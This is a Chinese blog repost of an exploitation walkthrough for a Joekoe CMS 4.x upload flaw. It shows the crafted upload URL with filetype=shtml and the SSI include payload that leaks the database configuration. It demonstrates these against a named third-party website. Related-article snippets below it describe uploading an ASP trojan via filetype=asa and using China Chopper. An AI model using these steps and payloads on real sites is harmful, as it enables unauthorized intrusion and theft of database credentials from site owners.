Joekoe CMS 4.x 上传漏洞

最新推荐文章于 2018-11-15 20:43:55 发布
最新推荐文章于 2018-11-15 20:43:55 发布
阅读量128 收藏
点赞数
原文链接:http://www.cnblogs.com/jannock/archive/2008/08/06/1262312.html
版权

from : http://www.siteweavercms.cn/Item/166.aspx

转载请注明:from http://www.siteweavercms.cn

    出于对CMS的研究,发现Joekoe CMS 4.x出现上传漏洞,而且大多数情况下能直接拿数据库地址或数据库数密码。
    为什么上传漏洞不是直接拿SHELL而是那这些呢?哈哈。。。
    别急,下面一步步讲解,这也算是一个值得大家注意的问题。
    以这个站为例:http://www.21suv.net/    本网站基于 Joekoe CMS 4.0 Release 技术架构

    我们来先注册一个用户。
    进入用户中心。
    发布信息。
    发布文章

上传图片,我们在新页打开(或拉一下就可以了)

上传图版地址为:

filetype 就是我们今日的主角
我们改为shtml

http://www.21suv.net/common/upload.asp?channel=article&filetype=shtml&filename=20080806180445k&fileinput=a_pic&formname=&thumbname=&thumbinput=
然后新建一个文本文件,内容如下:
<!-- #include file="http://www.cnblogs.com/common/config/configure.asp" -->

保存为 diy.shtml (名字随便,以shtml为后辍就行)
然后不用说了吧?浏览,上传

直接点击打开,如果页面不显示404,差不多就成功了。
我们在页面上点击右键,查看源码,发现了什么?

是吧。哈哈。。
就到这里。。

转载于:https://www.cnblogs.com/jannock/archive/2008/08/06/1262312.html

TOMMY201112
关注
joekoe CMS 4.0 上传漏洞
weixin_30716141的博客
07-30 226
影响版本:joekoe CMS 4.0 详细说明:Joekoe CMS 4.0 给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用...
乔客(joekoe) CMS 4.0 的2个高危漏洞
HackCode的专栏
07-30 784
 1 .上传漏洞:很好利用,把channel变量改一下,只要不等于forum、user.face、blog.logo就行,然后filetype改成asa,就可以光明正大的上传木马了,具体url可以这样common/upload.asp?channel=use2&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinp
杰奇CMS前端验证漏洞
whatiwhere的博客
11-15 3775
验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 掌握杰奇CMS上传漏洞的利用方法 了解如何对此漏洞进行修复 实验工具 中国菜刀:是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理,本次试验主要用到其动态脚本管理功能 Firebug:Firebug是fi...
.net cms系统
软件的世界
12-18 3270
提起开源cms,大家第一想到的是php的cms,因为php开源的最早,也最为用户和站长们认可,随着各大cms系统的功能的不断完善和各式各样的开源cms的出现,.net和java的高端的cms系统也逐渐的走上了开源的路线,尤其是 .net的cms系统,从最早国外的开源,到现在国内致力于.net的cms系统的研发的公司和团队也渐渐认清楚开源路线的必然性,于是乎竞相的提出开源战略路线,但有的还是并不是全
国内外cms网站大全
iteye_10465的博客
08-22 610
国内外cms网站大全     用了好多CMS系统,早就有心想写一个,本贴禀着公平,自由,客观的态度来评价各个主流的CMS产品,如果有人写过的,那我就算是汇总和归纳,希望能在让你选择CMS的时候有个比较参照纯属一家之言,如果有什么纰漏,错误之处,还请多多指正.CMS(Content Management System),中文叫作整站系统、文章系统,大概2004以前,如果想进行网站内容管理,基本上都是...
国内国外主流的CMS
Leoyang_FarAwayFrom的专栏
12-17 3550
<br /> <br /> <br />    用了好多CMS系统,早就有心想写一个,本贴禀着公平,自由,客观的态度来评价各个主流的CMS产品,<br /> 如果有人写过的,那我就算是汇总和归纳,希望能在让你选择CMS的时候有个比较参照<br /> 纯属一家之言,如果有什么纰漏,错误之处,还请多多指正.<br /><br /> CMS(Content Management System ),中文叫作整站系统、文章系统,大概2004以前,如果想进行网站内容管理,基本上都是靠手工维护,但千变
CMS整站系统完全接触【转】
IT如战场……
04-09 453
CMS(Content Management System),中文叫作整站系统、文章系统,大概2003以前asp出现之前,个人网站如果想进行网站内容管理,基本上都是靠手工维护,但千变万化的信息流,但没有好的程序支持,还继续靠手工完成是不可能的事,如果有一个好的系统来支撑你的网站,那将节省大量的人力物力,开发者就可能给客户一个软件包,可以用它定期人工修改网站。只要你配置安装好,你的编辑,在线记者,更...
乔客Joekoe CMS 4.0.rar
05-25
乔客Joekoe CMS 4.0给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用...
Joekoe CMS v5.0 RC build 20222.rar
07-05
Joekoe CMS 5.0 给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用的...
盐城学生网整站041001版(JOEKOE CMS1.0 SP3).rar
08-30
* 盐城学生网整站程序041001版(joekoe SP3内核) * * 网站: http://www.ycstudent.net * **************************************************************** * Copyright (C) 2004 ycstudent.net All Rights ...
『乔客在线』Joekoe v6.5.rar
08-30
【标题】"『乔客在线』Joekoe v6.5.rar" 提供的是一个名为 Joekoe 的在线服务平台的版本 6.5 的源代码。Joekoe 可能是一个专门为用户提供各种在线服务或功能的网站平台,比如技术支持、在线咨询、资源分享等。 ...
Joekoe CMS v1.2 SP1-ASP源码.zip
12-15
Joekoe CMS v1.2 SP1是一款基于ASP(Active Server Pages)技术的网站内容管理系统。ASP是一种由微软公司开发的服务器端脚本环境,它允许开发者在网页上动态生成HTML、XML等文档,为创建交互式的Web应用程序提供了...
国内各种主流CMS系统的比较和汇总
bocaimomo的专栏
04-08 3088
  国内各种主流CMS系统的比较和汇总  CMS(Content Management System),中文叫网站内容管理系统,大概2004以前,如果想进行网站内容管理,基本上都是靠手工维护,但千变万化的信息流,但没有好的程序支持,还继续靠手工完成是不可能的事,如果有一个好的系统来支撑你的网站,那将节省大量的人力物力,开发者就可能给客户一个软件包,可以用它定期人工修改网站。只要你配置安装好,你的编
多媒体素材库系统 基于Springboot和Mysql的多媒体素材库系统代码(程序,中文注释)
09-27
多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统 1、资源说明:多媒体素材库系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBo
PyOpenGL-3.1.5.tar.zip
最新发布
09-27
opengl安装包
Qt内置图标,独立头文件
09-27
Qt内置图标,独立头文件
站长百科详细指南:乔客CMS安装步骤解析
对于虚拟主机用户,只需将"joekoe cms"文件夹内的内容上传至虚拟空间,可参考《sudu.cn》的帮助文档获取上传方法。 5. **虚拟主机安装**: 虚拟主机用户只需将CMS文件夹上传到指定的安装地址,通常是网站的根目录...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值